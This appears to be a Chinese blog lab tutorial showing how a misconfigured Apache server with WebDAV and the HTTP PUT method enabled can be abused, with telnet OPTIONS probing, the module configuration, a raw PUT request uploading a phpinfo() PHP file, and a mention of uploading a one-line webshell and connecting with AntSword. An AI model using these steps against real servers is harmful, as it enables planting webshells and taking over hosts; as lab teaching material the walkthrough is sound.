欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

上传文件之PUT方法上传(服务器配置不当)

程序员文章站 2022-03-11 21:56:23
...

实验环境

Window server 2008 +phpstudy

第一章 文件上传的条件

Web 服务器要开启文件上传功能,并且上传api(接口)对外“开放”(Web 用户可以访问);

Web 用户对目标目录具有可写权限,甚至具有执行权限,一般情况下,Web 目录都有执行权限。
要想完美利用文件上传漏洞,就是上传的文件可以执行,也就是Web 容器可以解析我们上传的脚本,无论脚本以什么样的形式存在。
无视以上条件的情况就是服务器配置不当,开启了PUT 方法。

第二章window server2008开启telnet

【https://blog.csdn.net/qq_41901122/article/details/102159506】
window2008开启telnet服务

第三章 Apache 开启PUT 方法

第一节 测试Apache 是否开启了put 方法

telnet 192.168.139.136 80

----
OPTIONS / HTTP/1.1
HOST:172.16.132.161
----

上传文件之PUT方法上传(服务器配置不当)

第二节 apache 开启put 方法操作

第一步 开启Dav

1.开启模块
路径[C:\phpStudy\Apache\conf]

----
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
----

上传文件之PUT方法上传(服务器配置不当)

第二步 启用模块

上传文件之PUT方法上传(服务器配置不当)

第三步.开启文件锁
----
DavLockDB c:\phpstudy\www\DavLock
----

上传文件之PUT方法上传(服务器配置不当)上传文件之PUT方法上传(服务器配置不当)上传文件之PUT方法上传(服务器配置不当)上传文件之PUT方法上传(服务器配置不当)

第四章文件上传案例

Telnet 192.168.139.136 80

----
PUT  /infoa.php  HTTP/1.1
HOST: 192.168.139.136
Content-Length: 18
 
<?php phpinfo();?>
----

上传文件之PUT方法上传(服务器配置不当)上传文件之PUT方法上传(服务器配置不当)

尝试上传一句话木马–蚁剑链接
上传文件之PUT方法上传(服务器配置不当)上传文件之PUT方法上传(服务器配置不当)

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

相关标签: # 文件上传